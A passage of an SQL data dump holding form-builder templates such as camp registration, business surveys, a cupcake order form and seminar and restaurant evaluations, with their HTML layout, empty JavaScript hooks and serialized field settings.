Number:#**label**#type_number#****#5#**id**#SELECT COLLEGE#**label**#type_own_select#****#6#**id**#OTHER SPECIFY HERE#**label**#type_text#****#7#**id**#Word Verification:#**label**#type_captcha#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#', '1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Phone Number:#**label**#type_number#****#5#**id**#SELECT COLLEGE#**label**#type_own_select#****#6#**id**#OTHER SPECIFY HERE#**label**#type_text#****#7#**id**#Word Verification:#**label**#type_captcha#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*160*:*w_field_label_size*:*left*:*w_field_label_pos*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*extended*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*160*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_number*:*type*:*Phone Number:*:*w_field_label*:*160*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_own_select*:*type*:*SELECT COLLEGE*:*w_field_label*:*160*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**** GGSCMT,KHARAR*** DOABA KHARAR *** CAMBRIDGE COLLEGE FATEHGARH *** INDOGLOBAL *** QUEST COLLEGE *** UNIVERSAL ,LALRU *** OTHER PLEASE SPECIFY BELOW *:*w_choices*:*true***false***false***false***false***false***false***false*:*w_choices_checked*:*true***false***false***false***false***false***false***false*:*w_choices_disabled*:*yes*:*w_required*:*wdform_select*:*w_class*:**:*new_field*:*6*:*id*:*type_text*:*type*:*OTHER SPECIFY HERE*:*w_field_label*:*160*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*7*:*id*:*type_captcha*:*type*:*Word Verification:*:*w_field_label*:*160*:*w_field_label_size*:*left*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*8*:*id*:*type_submit_reset*:*type*:*type_submit_reset_8*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(3, 'Camp Registration Form', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Camper Name:%</div><div wdid="2" class="wdform_row">%2 - Camper Age Group:%</div><div wdid="3" class="wdform_row">%3 - Desire Cabin:%</div><div wdid="4" class="wdform_row">%4 - Does any one have allergies?%</div><div wdid="5" class="wdform_row">%5 - Has the camper been camping before?%</div><div wdid="6" class="wdform_row">%6 - Any questions or concern:%</div><div wdid="7" class="wdform_row">%7 - type_submit_reset_7%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 15, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 0, '%all%', '%all%', 8, 1, '1#**id**#Camper Name:#**label**#type_name#****#2#**id**#Camper Age Group:#**label**#type_own_select#****#3#**id**#Desire Cabin:#**label**#type_radio#****#4#**id**#Does any one have allergies?#**label**#type_radio#****#5#**id**#Has the camper been camping before?#**label**#type_radio#****#6#**id**#Any questions or concern:#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#', '1#**id**#Camper Name:#**label**#type_name#****#2#**id**#Camper Age Group:#**label**#type_own_select#****#3#**id**#Desire Cabin:#**label**#type_radio#****#4#**id**#Does any one have allergies?#**label**#type_radio#****#5#**id**#Has the camper been camping before?#**label**#type_radio#****#6#**id**#Any questions or concern:#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_name*:*type*:*Camper Name:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_own_select*:*type*:*Camper Age Group:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:****6-8***8-12***12-15*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*wdform_select*:*w_class*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*Desire Cabin:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*ver*:*w_flow*:*Cabin 1***Cabin 2***Cabin 3***Cabin 4***Cabin 5***Cabin 6***Cabin 7*:*w_choices*:*false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*4*:*id*:*type_radio*:*type*:*Does any one have allergies?*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*5*:*id*:*type_radio*:*type*:*Has the camper been camping before?*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*Any questions or concern:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_submit_reset*:*type*:*type_submit_reset_7*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(4, 'Business Demographic Survey', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"></div></div><div wdid="1" type="type_section_break" class="wdform_tr_section_break">%1 - custom_1%</div><div class="wdform_section"><div class="wdform_column"><div wdid="2" class="wdform_row">%2 - <b>What is your employment status?</b>%</div><div wdid="3" class="wdform_row">%3 - <b>What is your level of education?</b>%</div><div wdid="4" class="wdform_row">%4 - <b>In which industry do you work?</b>%</div><div wdid="5" class="wdform_row">%5 - <b>What is the annual revenue of your company?</b>%</div><div wdid="6" class="wdform_row">%6 - Word Verification:%</div><div wdid="7" class="wdform_row">%7 - type_submit_reset_7%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 10, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 1, '<p>%all%</p>', '<p>%all%</p>', 8, 1, '2#**id**#What is your employment status?#**label**#type_radio#****#3#**id**#What is your level of education?#**label**#type_radio#****#4#**id**#In which industry do you work?#**label**#type_own_select#****#5#**id**#What is the annual revenue of your company?#**label**#type_radio#****#6#**id**#Word Verification:#**label**#type_captcha#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#', '2#**id**#What is your employment status?#**label**#type_radio#****#3#**id**#What is your level of education?#**label**#type_radio#****#4#**id**#In which industry do you work?#**label**#type_own_select#****#5#**id**#What is the annual revenue of your company?#**label**#type_radio#****#6#**id**#Word Verification:#**label**#type_captcha#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_section_break*:*type*:*custom_1*:*w_field_label*:*<h2 id="header_1" style="font-size: 1.285714286rem; font-family: Helvetica, Arial, sans-serif; color: rgb(68, 68, 68); clear: both; line-height: 1.6; margin: 1.714285714rem 0px;">Business Demographic Survey</h2><p style="line-height: 1.714285714; margin: 0px 0px 1.714285714rem; color: rgb(68, 68, 68); font-family: Helvetica, Arial, sans-serif; font-size: 14px;"></p><div id="subHeader_1" style="color: rgb(68, 68, 68); font-family: Helvetica, Arial, sans-serif; font-size: 14px; line-height: 14px;">Thank you for joining our business demographic survey. Please give us your feedback by filling in the information bellow.</div><p><br></p>*:*w_editor*:**:*new_field*:*2*:*id*:*type_radio*:*type*:*<b>What is your employment status?</b>*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*ver*:*w_flow*:*Employed full time***Trade or Vocational degree***Not employed, but looking for work***Not employed and not looking for work***Retired***Student***Homemaker***Prefer not to answer*:*w_choices*:*false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*<b>What is your level of education?</b>*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*ver*:*w_flow*:*Some high school***High school graduate or equivalent***Trade or Vocational Degree***Some college***Associate degree***Bachelor&#39;s degree***Graduate or Professional degree***Prefer not to answer*:*w_choices*:*false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*4*:*id*:*type_own_select*:*type*:*<b>In which industry do you work?</b>*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:****option 1***option 2***option 3*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*wdform_select*:*w_class*:**:*new_field*:*5*:*id*:*type_radio*:*type*:*<b>What is the annual revenue of your company?</b>*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*ver*:*w_flow*:*Under $10,000***$10,001 to $50,000***$50,001 to $100,000***$100,001 to $500,000***$500,001 to $1 Million***$1 Million to $10 Million***$10 Million to $50 Million***$50 Million to $100 Million***Over $100 Million*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*6*:*id*:*type_captcha*:*type*:*Word Verification:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*7*:*id*:*type_submit_reset*:*type*:*type_submit_reset_7*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(5, 'Register Your Business', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Business Owner %</div><div wdid="2" class="wdform_row">%2 - Business Name%</div><div wdid="3" class="wdform_row">%3 - E-mail%</div><div wdid="4" class="wdform_row">%4 - Address:%</div><div wdid="10" class="wdform_row">%10 - Type of Business%</div><div wdid="11" class="wdform_row">%11 - Message%</div><div wdid="12" class="wdform_row">%12 - type_submit_reset_12%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 26, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 0, '%all%', '%all%', 13, 1, '1#**id**#Business Owner #**label**#type_name#****#2#**id**#Business Name#**label**#type_text#****#3#**id**#E-mail#**label**#type_submitter_mail#****#4#**id**#Street Address#**label**#type_address#****#5#**id**#Street Address Line 2#**label**#type_address#****#6#**id**#City#**label**#type_address#****#7#**id**#State / Province / Region#**label**#type_address#****#8#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Country#**label**#type_address#****#10#**id**#Type of Business#**label**#type_own_select#****#11#**id**#Message#**label**#type_textarea#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#', '1#**id**#Business Owner #**label**#type_name#****#2#**id**#Business Name#**label**#type_text#****#3#**id**#E-mail#**label**#type_submitter_mail#****#4#**id**#Street Address#**label**#type_address#****#5#**id**#Street Address Line 2#**label**#type_address#****#6#**id**#City#**label**#type_address#****#7#**id**#State / Province / Region#**label**#type_address#****#8#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Country#**label**#type_address#****#10#**id**#Type of Business#**label**#type_own_select#****#11#**id**#Message#**label**#type_textarea#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_name*:*type*:*Business Owner *:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Business Name*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*10*:*id*:*type_own_select*:*type*:*Type of Business*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:*Select value***option 1***option 2*:*w_choices*:*true***false***false*:*w_choices_checked*:*true***false***false*:*w_choices_disabled*:*yes*:*w_required*:*wdform_select*:*w_class*:**:*new_field*:*11*:*id*:*type_textarea*:*type*:*Message*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*12*:*id*:*type_submit_reset*:*type*:*type_submit_reset_12*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(6, 'Cupcake Order Form', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Date%</div><div wdid="2" class="wdform_row">%2 - Name%</div><div wdid="3" class="wdform_row">%3 - E-mail:%</div><div wdid="4" class="wdform_row">%4 - <b>Cupcakes <br> Flavors (1 doz. minimum)</b>%</div><div wdid="5" class="wdform_row">%5 - Quantity%</div><div wdid="6" class="wdform_row">%6 - Details (if any)%</div><div wdid="7" class="wdform_row">%7 - type_submit_reset_7%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 6, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 0, '%all%', '%all%', 8, 1, '1#**id**#Date#**label**#type_date#****#2#**id**#Name#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Cupcakes  Flavors (1 doz. minimum)#**label**#type_checkbox#****#5#**id**#Quantity#**label**#type_own_select#****#6#**id**#Details (if any)#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#', '1#**id**#Date#**label**#type_date#****#2#**id**#Name#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Cupcakes  Flavors (1 doz. minimum)#**label**#type_checkbox#****#5#**id**#Quantity#**label**#type_own_select#****#6#**id**#Details (if any)#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_date*:*type*:*Date*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:**:*w_date*:*yes*:*w_required*:**:*w_class*:*%Y-%m-%d*:*w_format*:*...*:*w_but_val*:**:*new_field*:*2*:*id*:*type_name*:*type*:*Name*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_checkbox*:*type*:*<b>Cupcakes <br> Flavors (1 doz. minimum)</b>*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*ver*:*w_flow*:*Red Velvet ($150.00 TTD)***Vanilla ($100.00 TTD)***Chocolate ($120.00 TTD)***Guinness ($150.00 TTD)***Coconut ($120.00 TTD)***Lemon ($100.00 TTD)***Chocolate Mint ($120.00 TTD)*:*w_choices*:*false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*5*:*id*:*type_own_select*:*type*:*Quantity*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*50*:*w_size*:****1***2***3***4***5***6***7***8***9***10*:*w_choices*:*true***false***false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*true***false***false***false***false***false***false***false***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*wdform_select*:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*Details (if any)*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_submit_reset*:*type*:*type_submit_reset_7*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(7, 'Seminar Evaluation Survey', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"></div></div><div wdid="1" type="type_section_break" class="wdform_tr_section_break">%1 - custom_1%</div><div class="wdform_section"><div class="wdform_column"><div wdid="2" class="wdform_row">%2 - <b>Company</b>%</div><div wdid="3" class="wdform_row">%3 - <b>Occupation</b>%</div><div wdid="4" class="wdform_row">%4 - <b>Was it worth its money?</b>%</div><div wdid="5" class="wdform_row">%5 - <b>On average how would you rate the seminar?</b>%</div><div wdid="6" class="wdform_row">%6 - type_submit_reset_6%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 16, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 0, '%all%', '%all%', 7, 1, '2#**id**#Company#**label**#type_text#****#3#**id**#Occupation#**label**#type_text#****#4#**id**#Was it worth its money?#**label**#type_radio#****#5#**id**#On average how would you rate the seminar?#**label**#type_radio#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#', '2#**id**#Company#**label**#type_text#****#3#**id**#Occupation#**label**#type_text#****#4#**id**#Was it worth its money?#**label**#type_radio#****#5#**id**#On average how would you rate the seminar?#**label**#type_radio#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_section_break*:*type*:*custom_1*:*w_field_label*:*<h1 id="header_1" style="font-size: 1.5rem; font-family: Helvetica, Arial, sans-serif; color: rgb(68, 68, 68); clear: both; line-height: 1.5; margin: 1.714285714rem 0px;">Seminar Evaluation Survey</h1><div id="subHeader_1" style="color: rgb(68, 68, 68); font-family: Helvetica, Arial, sans-serif; font-size: 14px; line-height: 14px;">Please take a few minutes to complete this evaluation survey</div>*:*w_editor*:**:*new_field*:*2*:*id*:*type_text*:*type*:*<b>Company</b>*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_text*:*type*:*<b>Occupation</b>*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_radio*:*type*:*<b>Was it worth its money?</b>*:*w_field_label*:*200*:*w_field_label_size*:*top*:*w_field_label_pos*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*5*:*id*:*type_radio*:*type*:*<b>On average how would you rate the seminar?</b>*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*ver*:*w_flow*:*Very good***Good***Neutral***Bad***Very bad*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(8, 'Restaurant Evaluation Survey', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"></div></div><div wdid="1" type="type_section_break" class="wdform_tr_section_break">%1 - custom_1%</div><div class="wdform_section"><div class="wdform_column"><div wdid="2" class="wdform_row">%2 - Day Visited:%</div><div wdid="3" class="wdform_row">%3 - <b>Dine In / Take Out:</b>%</div><div wdid="4" class="wdform_row">%4 - <b>Food Quality:</b>%</div><div wdid="5" class="wdform_row">%5 - <b>Speed of Service:</b>%</div><div wdid="6" class="wdform_row">%6 - <b>Any comments, questions or suggestions?</b>%</div><div wdid="7" class="wdform_row">%7 - type_submit_reset_7%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 21, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 0, '%all%', '%all%', 8, 1, '2#**id**#Day Visited:#**label**#type_date#****#3#**id**#Dine In / Take Out:#**label**#type_radio#****#4#**id**#Food Quality:#**label**#type_radio#****#5#**id**#Speed of Service:#**label**#type_radio#****#6#**id**#Any comments, questions or suggestions?#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#', '2#**id**#Day Visited:#**label**#type_date#****#3#**id**#Dine In / Take Out:#**label**#type_radio#****#4#**id**#Food Quality:#**label**#type_radio#****#5#**id**#Speed of Service:#**label**#type_radio#****#6#**id**#Any comments, questions or suggestions?#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_section_break*:*type*:*custom_1*:*w_field_label*:*<h2 id="header_21" style="font-size: 1.285714286rem; font-family: Helvetica, Arial, sans-serif; color: rgb(68, 68, 68); clear: both; line-height: 1.6; margin: 1.714285714rem 0px;">Restaurant Evaluation Survey</h2><div id="subHeader_21" style="color: rgb(68, 68, 68); font-family: Helvetica, Arial, sans-serif; font-size: 14px; line-height: 14px;">Please let us know how was the food and service.</div><p><br></p>*:*w_editor*:**:*new_field*:*2*:*id*:*type_date*:*type*:*Day Visited:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:**:*w_date*:*no*:*w_required*:**:*w_class*:*%Y-%m-%d*:*w_format*:*...*:*w_but_val*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*<b>Dine In / Take Out:</b>*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*ver*:*w_flow*:*Dine In***Dine Out*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*4*:*id*:*type_radio*:*type*:*<b>Food Quality:</b>*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*ver*:*w_flow*:*Excellent***Good***Average***Dissatisfied*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*5*:*id*:*type_radio*:*type*:*<b>Speed of 